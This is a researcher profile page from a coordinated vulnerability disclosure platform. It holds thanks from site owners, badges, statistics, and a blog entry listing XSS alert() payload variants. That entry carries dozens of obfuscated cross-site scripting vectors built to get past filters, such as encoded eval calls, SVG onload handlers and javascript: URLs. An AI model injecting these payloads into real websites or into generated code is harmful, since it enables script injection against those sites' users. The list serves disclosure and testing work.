Coordinated and Responsible Vulnerability Disclosure Free Bug Bounty Program 467,603 coordinated disclosures
249,699 fixed vulnerabilities
617 bug bounties with 1239 websites
12,584 researchers, 974 honor badges

Gh05tPT Top Security Researcher of the Month Top VIP Security Researcher of the Month | Security Researcher Profile


Security researcher Gh05tPT has already helped fix 5793 vulnerabilities.



Researcher reputation:  620

Real name:
#Gh05tPT #inurlBR #Ch3rn0bylH4ck3r5 #aCCESS

About me:
http://blog.inurl.com.br/

How to contact me:
https://twitter.com/Gh05tPT
[email protected]
http://blog.inurl.com.br/
https://facebook.com/podzemie4544
https://facebook.com/exchangesec/

Alternative Contacts:
http://blog.inurl.com.br/

Experience in Application Security
over 5 years

Award / Bug Bounty I prefer:
A thanks/profile recommendation will be really appreciated, but if you'd like:
paypal.me/Gh05tPT
# Bug Bounty ($$$)
# Hall Of Fame
# T-shirts, Sweats, Caps, Stickers, Keychains, etc

Halls of Fame:
https://www.pejadesign.com/chi-siamo/chi-siamo#manyThanks.
https://unite.un.org/content/hall-fame

Follow me on:
Twitter
Facebook

Recommendations and Acknowledgements

    12 November, 2019
     arthurebel Arthur from University Of Technology of Troyes:
Thank you for your help, for the detail of XSS vulnerabilty. Much appreciate.
    12 November, 2019
     koichiendor koichiendor from ADMINA:
Thanks for reporting XSS issue on my site. Clear report, helpful support. :)
    29 October, 2019
     dialbuquerque Diego Albuquerque from CNMP:
O Gh05tPT reportou uma vulnerabilidade em um sistema do órgão em que trabalho e nos ajudou a solucioná-la logo no primeiro contato. Muito obrigado.
    16 October, 2019
     TravisSwaim T. Swaim from Earth System Science Interdisciplinary Center - UMD:
Was very easy to contact Gh05tPT and get the information needed to help fix the vulnerability found on our website. Wonderful security researcher to deal with and I'm glad that people like this exist to help make the internet a more secure and safe place.
    20 September, 2019
     ChipZ_de Andreas from MEHRKANAL:
Gh05tPT has found an XSS vulnerability on one of our pages.

He is very helpful and responded very quickly. I really appreciate it. Thank you very much.
    21 August, 2019
     aaccomazzi Alberto Accomazzi from Center for Astrophysics:
One more XSS bug discovered and patched thanks to Gh05tPT. Much appreciated!
    3 August, 2019
     NewLineHorizon1 Melisa from NewLineHorizon:
Dear,

Thanks for participating in responsible disclosure program.
The reports you submitted were extremely helpful to our team and provided us the details we needed to resolve the issues that you identified.
We are deeply committed to provide a safe and secure experience to our users and are therefore grateful for your efforts to help us improve our services.

Best Regards!
    12 June, 2019
     tony_marston Tony Marston from Radicore Software Limited:
Gh05tPT found a XSS vulnerability on my site which I was able to fix quite quickly. Thanks for your help.
    12 June, 2019
     CapaniAntonio Antonio Capani from Nibbles.it s.r.l.:
Gh05tPT found a XSS vulnerability on one of our sites. We will fix it on the next version of our CMS. Thank you very much for your help!
    24 May, 2019
     aaccomazzi Alberto Accomazzi from Center for Astrophysics:
Gh05tPT helped us discover and fix an XSS vulnerability on our website. Much appreciated!

Shows the first 10 recommendations. See all.

Please login via Twitter to add a recommendation

Honor Badges


Number of Secured Websites

10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN
1000+ Websites

Advanced Security Research

WAF Bypasser
CSRF Master
30+ Reports
AppSec Logic Master
30+ Reports
Fastest Fix
Fix in 24 hours

Outstanding Achievements

Secured OBB
OBB Advocate
Improved OBB

Commitment to Remediate and Patch

Patch Master
55% Patched
Patch Guru
65% Patched
Patch Lord
75% Patched

Recommendations and Recognition

REPUTABLE
10+ Recommends
FAMOUS
25+ Recommends
GLOBALLY TRUSTED
50+ Recommends

Distinguished Blog Author

1 Post
3 Posts
5+ Posts

Research Statistics



Total reports:18526
Total reports on VIP sites:355
Total patched vulnerabilities:5793
Total vulnerabilities on Hold (Open Bug Bounty):3302
Recommendations received:41
Active since:05.04.2018
Top Security Researcher Awards: Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month
Top VIP Security Researcher Awards: Top VIP Security Researcher of the Month Top VIP Security Researcher of the Week

Open Bug Bounty Certificate



04.04.2019  XSS alert() variants

<script>prompt(1)</script> 
<script>confirm(1)</script>
<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script> <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script> <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script> <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script> <script>throw~delete~typeof~prompt(1)</script> <script>delete[a=alert]/prompt a(1)</script> <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script> <script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script> <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script> <script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script> <script>Array.from`${eval}alert\`1\``</script> <script>Array.from([1],alert)</script> <script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u> <videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script> <script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script> <script>x=new class extends Function{}('alert(1)'); x=new x;</script> <script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script> <script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1) <svg><script/xlink:href=data:,alert(1)></script> <frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>

Reported Vulnerabilities

All Submissions VIP SubmissionsFeatured Submissions

Domain Reported Status Type
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting
11.11.2019
On Hold
Cross Site Scripting

  Latest Patched

 13.11.2019 axis.com
 13.11.2019 icternodisola.gov.it
 13.11.2019 writing.com
 13.11.2019 auslogics.com
 12.11.2019 y2mate.com
 12.11.2019 in-pocasi.cz
 12.11.2019 icecreamapps.com
 12.11.2019 qm41.com
 12.11.2019 booklooker.de
 11.11.2019 darty.com

  Latest Blog Posts

30.10.2019 by Nep_1337_1998
Denial of Service vulnerability in script-loader.php (CVE-2018-6389)
17.10.2019 by 0xrocky
Stored XSS
17.10.2019 by geeknik
The "S" in IOT is for Security
16.10.2019 by Fadavvi
Best XSS Vectors
01.10.2019 by Renzi25031469
#Security 100%

  Recent Recommendations

    13 November, 2019
     shaikha01874386:
Good going, doing great work.
    13 November, 2019
     shaikha01874386:
Good going, doing great work.
    13 November, 2019
     shaikha01874386:
Thanks Faizan, most helpful and great work, really appreciated! Impressed of the quick help how to fix. Good man!
    13 November, 2019
     shaikha01874386:
Thanks a lot Eduardo for the report and explanation of what you found. The issue has been patched.
    13 November, 2019
     Lukanest1:
Thank you once again faizan_mark.